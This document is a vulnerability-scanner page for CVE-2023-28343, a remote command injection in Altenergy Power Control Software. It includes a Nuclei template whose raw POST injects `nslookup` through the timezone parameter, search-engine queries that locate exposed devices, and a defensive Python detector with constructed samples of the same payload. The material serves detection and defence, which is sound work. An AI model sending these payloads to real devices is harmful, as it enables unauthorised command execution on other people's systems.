Altenergy Power Control Software C1.2.5 - Remote Command Injection
ID: CVE-2023-28343
Severity: critical
Author: pikpikcu
Tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems
Description
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
YAML Source
id: CVE-2023-28343

info:
  name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
  reference:
    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
    - https://apsystems.com
    - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28343
    - https://github.com/hba343434/CVE-2023-28343
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28343
    cwe-id: CWE-78
    epss-score: 0.84636
    epss-percentile: 0.98506
    cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apsystems
    product: energy_communication_unit_firmware
    shodan-query:
      - title:"Altenergy Power Control Software"
      - http.title:"altenergy power control software"
    fofa-query: title="altenergy power control software"
    google-query:
      - intitle:"Altenergy Power Control Software"
      - intitle:"altenergy power control software"
  tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems

http:
  - raw:
      - |
        POST /index.php/management/set_timezone HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip, deflate
        Referer: {{RootURL}}/index.php/management/datetime

        timezone=`nslookup {{interactsh-url}}`

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "Time Zone updated successfully"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022047c0089e29b0ce3985c14afd3101c108554dfcc51ca71be457c96cef7dbd3c2f0221009c2f8ce7ea0fd409df3eeba6aaa31158f4d7cdaff1981445aed67750a124a459:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-28343.yaml"
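A defender-side counterpart to the template, added here as an example and not part of the template or the vendor's code: it inspects captured POST requests to the set_timezone endpoint and flags any timezone value that carries shell metacharacters or is not shaped like a zone name. The IANA-style pattern, the three-round decoding limit and the function names are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

ENDPOINT = "/index.php/management/set_timezone"  # path from the advisory
# Assumption: valid values are IANA-style names ("UTC", "Asia/Shanghai", "Etc/GMT+8").
ZONE_RE = re.compile(r"[A-Za-z][A-Za-z0-9_+-]*(?:/[A-Za-z0-9_+-]+){0,2}")
# Characters with special meaning to a POSIX shell, plus whitespace.
SHELL_META = set("`$;|&<>(){}[]\\'\"!*?~# \t\r\n")


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %2560 and %60 both end up as a backtick."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method, path, body):
    """Return findings for one captured request; an empty list means nothing to report."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ENDPOINT:
        return []
    findings = []
    # parse_qs performs the first round of form decoding ('+' and %XX).
    for raw in parse_qs(body, keep_blank_values=True).get("timezone", []):
        value = fully_decode(raw)
        meta = sorted(SHELL_META.intersection(value))
        if meta:
            findings.append(("shell-metacharacter", "".join(meta)))
        elif not ZONE_RE.fullmatch(value):
            findings.append(("not-a-zone-name", value))
    return findings


SAMPLES = [  # constructed records: (method, path, form body)
    ("POST", ENDPOINT, "timezone=Asia%2FShanghai"),
    ("POST", ENDPOINT, "timezone=`nslookup probe.oast.example`"),
    ("POST", ENDPOINT, "timezone=%2560nslookup%2520probe.oast.example%2560"),
    ("GET", "/index.php/management/datetime", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body) or "ok")
```

The same allowlist pattern can be applied server-side before the value reaches any shell, which addresses the CWE-78 root cause rather than only detecting it.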